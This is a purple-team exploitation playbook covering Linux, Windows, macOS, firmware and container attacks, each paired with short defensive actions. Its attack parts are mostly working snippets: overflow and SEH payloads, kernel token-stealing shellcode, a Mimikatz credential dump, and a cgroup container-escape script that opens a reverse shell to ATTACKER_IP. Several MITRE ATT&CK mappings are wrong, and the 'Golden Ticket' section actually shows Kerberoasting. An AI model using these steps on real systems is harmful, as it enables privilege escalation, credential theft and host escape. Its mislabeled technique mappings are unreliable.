OS & hardware exploitation playbook¶

From stack overflows to kernel exploits and next-gen patch analysis

Linux exploitation¶

Basic attacks¶

Stack-based buffer overflow¶

MITRE: T1205

Tools:

# Crash a vulnerable program  
python2 -c 'print "A"*500' | ./vuln_program  
# Find EIP offset with GDB  
gdb -q ./vuln_program  
pattern create 500  

Exploit development¶

MITRE: T1068

Tools:

# Python2 exploit skeleton  
from struct import pack  
buf = "A"*264 + pack("<I", 0xdeadbeef)  # EIP overwrite  
open("payload", "wb").write(buf)  

Purple team actions

• Red: Exploit 32-bit binaries with pwntools.

• Blue: Deploy PaX/Grsecurity to enforce NX/ASLR.

Advanced Linux bypasses¶

Attack paths¶

ROP Chaining (NX Bypass)¶

MITRE: T1497

Tools:

# Find gadgets with ROPgadget  
ROPgadget --binary libc.so.6 | grep "pop rdi"  

ASLR/PIE Leak¶

MITRE: T1599

Tools:

# Leak libc address via format string  
payload = "%7$s".ljust(8) + p64(libc.got["puts"])  

Purple team actions

• Red: Use angr for automated ROP chain generation.

• Blue: Enable CFI and kernel pointer sanitization.

Linux kernel exploits¶

Attack paths¶

ret2usr (SMEP Bypass)¶

MITRE: T1068

Tools:

// Kernel payload to escalate to root  
commit_creds(prepare_kernel_cred(0));  

KASLR Bypass¶

MITRE: T1599

Tools:

# Leak kernel pointers via /proc/kallsyms  
grep "T startup_64" /proc/kallsyms  

Purple team actions

• Red: Test DirtyPipe (CVE-2022-0847).

• Blue: Disable legacy vsyscall and restrict /proc/kallsyms access.

Windows exploitation¶

Basic attacks¶

SEH overwrite¶

MITRE: T1205

Tools:

# SEH chain overwrite pattern  
buf = "A"*500 + "\xeb\x06\x90\x90" + pack("<I", 0x62501203)  

ROP (Bypass DEP)¶

MITRE: T1497

Tools:

# Find gadgets with Mona (Immunity Debugger)  
!mona rop -m kernel32.dll -cpb "\x00\x0a"  

Purple team actions

• Red: Exploit Office macros with SharpShooter.

• Blue: Enforce EMET or WDEG.

Windows kernel exploits¶

Attack paths¶

Token stealing¶

MITRE: T1098

Tools:

// Kernel shellcode to steal SYSTEM token  
mov rax, [gs:0x188]      // Current thread  
mov rax, [rax+0xb8]      // EPROCESS  
mov rbx, [rax+0x2e8]     // SYSTEM EPROCESS  

Driver exploitation¶

MITRE: T1068

Tools:

# Find vulnerable drivers with DriverQuery  
driverquery /v | findstr "UNSAFE"  

Purple team actions

• Red: Exploit PrintNightmare.

• Blue: Block vulnerable drivers via HVCI.

PowerShell & post-exploitation¶

Attack paths¶

Credential theft¶

MITRE: T1003

Tools:

# Dump LSASS with Mimikatz  
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'  

AD Persistence¶

MITRE: T1098

Tools:

# Golden Ticket attack  
Invoke-Kerberoast -OutputFormat Hashcat | % { $_.Hash } | Out-File hashes.txt  

Purple team actions

• Red: Lateral movement with Rubeus.

• Blue: Monitor for 4624 (Kerberos TGT requests).

macOS exploitation¶

XNU Heap Overflow (CVE-2021-30860)

Attack path¶

MITRE: T1068

Exploit Steps:

// Trigger IOMFB vulnerability (simplified)  
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOMobileFramebuffer"));  
IOConnectCallMethod(service, 78, input, inputCnt, output, &outputCnt);  // OOB write  

Purple team actions

• Red: Weaponize with MacDirtyCow (CVE-2022-46689).

• Blue: Enable System Integrity Protection (SIP) and monitor kernel_task crashes.

Next-Gen patch exploitation¶

Attack paths¶

Binary diffing¶

MITRE: T1599

Tools:

# Patch diffing with BinDiff  
bindiff old.exe new.exe  

1-Day exploits¶

MITRE: T1599

Tools:

# Reverse engineer patch Tuesday updates  
from binaryninja import *  
bv = BinaryViewType.get_view_of_file("patched.dll")  

Purple team actions

• Red: Develop exploits from PatchDiffing results.

• Blue: Deploy SigCheck for binary integrity.

Firmware diffing (UEFI/ACPI)¶

Attack paths¶

UEFI vulnerability hunting¶

MITRE: T1542.001

Tools:

# Extract firmware with CHIPSEC  
python3 chipsec_util.py spi dump firmware.rom  
# Diff UEFI modules with UEFITool  
uefitool firmware.rom extract -o modules  

ACPI table tampering¶

MITRE: T1542.002

Tools:

# Dump ACPI tables in Linux  
acpidump > acpi.dat  
# Disassemble AML with iasl  
iasl -d dsdt.dat  

Purple team actions

• Red: Exploit Thunderstrike (UEFI bootkit).

• Blue: Verify firmware with Linux Vendor Firmware Service.

Container escape exploits¶

CVE-2022-0492 (cgroups v1 Release Agent Escape)

Attack path¶

MITRE: T1611 (Escape to Host)

Exploit Steps:

# 1. Check vulnerable cgroups config  
grep cgroup /proc/self/mountinfo | grep release_agent  

# 2. Trigger escape (requires CAP_SYS_ADMIN in container)  
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp  
echo 1 > /tmp/cgrp/notify_on_release  
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)  
echo "$host_path/cmd" > /tmp/cgrp/release_agent  
echo '#!/bin/sh' > /cmd  
echo "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" >> /cmd  
chmod +x /cmd  
sh -c "echo \$\$ > /tmp/cgrp/cgroup.procs"  

Purple team actions

• Red: Test escape in Docker/Kubernetes with CDK.

• Blue: Enforce deny mount cgroup in AppArmor.

Purple team outcomes¶

Red team¶

• Linux: ROP chains bypassing NX+PIE+ASLR.

• Windows: Weaponized Office docs with CVE-2021-40444.

• AD: Golden/Silver ticket attack trees.

• Container: Proof-of-concept for Kubernetes pod → host escapes.

• macOS: Weaponized XNU exploits (e.g., privilege escalation to root).

• Firmware: Mapped UEFI vulnerabilities to ATT&CK for ICS.

Blue team¶

• Linux: eBPF-based kernel exploit detection.

• Windows: Attack Surface Reduction rules.

• AD: BloodHound defensive mappings.

• Container: GKE/ECS hardening guides with gVisor.

• macOS: Gatekeeper + XProtect rules.

• Firmware: UEFI Secure Boot enforcement via Microsoft DBX.

Final deliverable¶

• Workshop: Kernel exploit lab (Linux/Windows).

• ATT&CK Navigator: Customized Enterprise + ICS layers.

• Patch Analysis: Monthly diffing report template.